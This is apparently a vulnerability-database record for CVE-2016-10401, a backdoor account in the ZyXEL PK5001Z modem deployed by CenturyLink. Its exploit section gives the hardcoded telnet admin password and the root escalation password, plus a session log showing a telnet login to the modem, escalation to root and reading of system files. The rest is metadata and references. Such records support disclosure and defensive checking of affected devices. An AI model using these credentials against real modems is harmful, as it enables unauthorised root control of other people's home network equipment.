ID
VAR-E-201710-0220
CVE
| cve_id: | CVE-2016-10401 | Trust: 1.5 |
EDB ID
43105
TITLE
ZyXEL PK5001Z Modem - Backdoor Account - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
ZyXEL PK5001Z Modem - Backdoor Account. CVE-2016-10401 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | zyxel | model: | pk5001z modem | scope: | - | version: | - | Trust: 1.6 |
| vendor: | zyxel | model: | pk5001z | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password.
# Google Dork: n/a
# Date: 2017-10-31
# Exploit Author: Matthew Sheimo
# Vendor Homepage: https://www.zyxel.com/
# Software Link: n/a
# Version: PK5001Z 2.6.20.19
# Tested on: Linux
# About: ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world.
# Linked CVE's: CVE-2016-10401
Hardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet
username: admin
password: CenturyL1nk
Escalate to root with 'su' and this password.
password: zyad5001
[root:/]# telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
PK5001Z login: admin
Password: CenturyL1nk
$ whoami
admin_404A03Tel
$ su
Password: zyad5001
# whoami
root
# uname -a
Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown
# cat /etc/zyfwinfo
Vendor Name: ZyXEL Communications Corp.
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Backdoor Account
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | root | Trust: 0.5 |
CREDITS
Matthew Sheimo
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 43105 | Trust: 1.6 |
| db: | NVD | id: | CVE-2016-10401 | Trust: 1.5 |
| db: | EDBNET | id: | 94951 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 144851 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2016-10401 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/43105/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 144851 |
| db: | EXPLOIT-DB | id: | 43105 |
| db: | EDBNET | id: | 94951 |
LAST UPDATE DATE
2022-07-27T09:42:23.090000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 144851 | date: | 2017-11-02T15:59:27 |
| db: | EXPLOIT-DB | id: | 43105 | date: | 2017-10-31T00:00:00 |
| db: | EDBNET | id: | 94951 | date: | 2017-11-01T00:00:00 |